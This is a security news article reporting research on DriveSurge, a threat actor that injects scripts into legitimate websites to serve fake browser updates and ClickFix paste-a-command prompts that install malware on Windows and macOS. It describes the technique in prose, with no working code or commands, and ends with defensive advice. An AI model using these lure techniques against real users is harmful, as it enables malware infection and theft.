New DriveSurge Threat Actor Uses ClickFix and Fake Updates to Infect Website Visitors
Silent Push researchers have identified DriveSurge, a sophisticated threat actor using ClickFix social engineering and fake browser update pages to compromise thousands of legitimate websites.
A newly identified threat actor named DriveSurge has been quietly compromising thousands of legitimate websites to push malware onto unsuspecting visitors. Using a combination of fake browser update pages and a social engineering trick known as ClickFix, this operation ran largely undetected until now. What makes DriveSurge especially dangerous is not just its scale, but the deep sophistication built into its infrastructure to automate malware delivery at massive scale.
DriveSurge works by injecting malicious code into high-reputation, legitimate websites without the knowledge of site owners or their visitors. When someone visits one of these compromised sites, hidden code quietly routes them through a Traffic Distribution System, or TDS. This system profiles each visitor and decides what to serve them next, making the attack feel natural and highly targeted at the same time.
Silent Push researchers said in a report shared with Cyber Security News that they identified DriveSurge as the primary driver behind a massive surge in ClickFix and Fake Update campaigns across the web. According to their analysis, DriveSurge operates as a specialized Initial Access Broker using a Pay-Per-Install model, where payment is collected each time a victim device is successfully infected. Those confirmed infection leads are then sold to other threat actors operating downstream.
Researchers uncovered eight distinct technical fingerprints that map out DriveSurge's malicious infrastructure, from how scripts are injected into victim sites to the registration patterns used for its domains. This level of operational detail points to a threat actor that has invested serious time into building a repeatable, scalable infection system. The group has compromised thousands of websites that redirect visitors to malware, all without site owners ever knowing.
The campaign targets a wide range of browsers, including Google Chrome, Mozilla Firefox, Microsoft Edge, Safari, Opera, Brave, Yandex, Vivaldi, Samsung Internet, and UC Browser. Victims encounter either a fake browser update page or a ClickFix prompt, both designed to look completely routine and trustworthy. That familiarity is exactly what makes both methods so effective against everyday users.
DriveSurge deploys two main methods to trick users into installing malware on their own devices. In the Fake Update scenario, a compromised site displays a convincing browser update prompt that impersonates a well-known browser. Clicking the update button triggers the download of a ZIP file containing multiple DLL files and a "Browser Update.exe" file that is actually malware. The ClickFix method works differently. A fake error message instructs the victim to copy and paste a command into their terminal or PowerShell window, which then silently installs malware. In one confirmed instance, the ClickFix prompt tried to pull malicious code from an IP address already flagged in active threat intelligence feeds.
Analysis of obfuscated JavaScript files tied to DriveSurge revealed the attack chain does not only target Windows machines. One analyzed payload delivered macOS malware, showing that DriveSurge is actively building a cross-platform victim pool. The payload used a multi-stage shell command that downloaded a secondary file, executed it, and then deleted itself immediately to reduce forensic traces. Researchers also discovered a separate Advertisement Distribution System linked to the campaign that collects device metadata and uses behavioral signals like mouse movements, scrolls, and clicks to confirm human presence before delivering content.
Organizations are advised to monitor for unusual external JavaScript injections, audit third-party scripts loading from unrecognized domains, and ensure web-facing content management systems remain fully patched and access-controlled. The full list of indicators of compromise provided by Silent Push includes multiple domains and email addresses tied to DriveSurge's infrastructure, enabling defenders to block and hunt for related activity.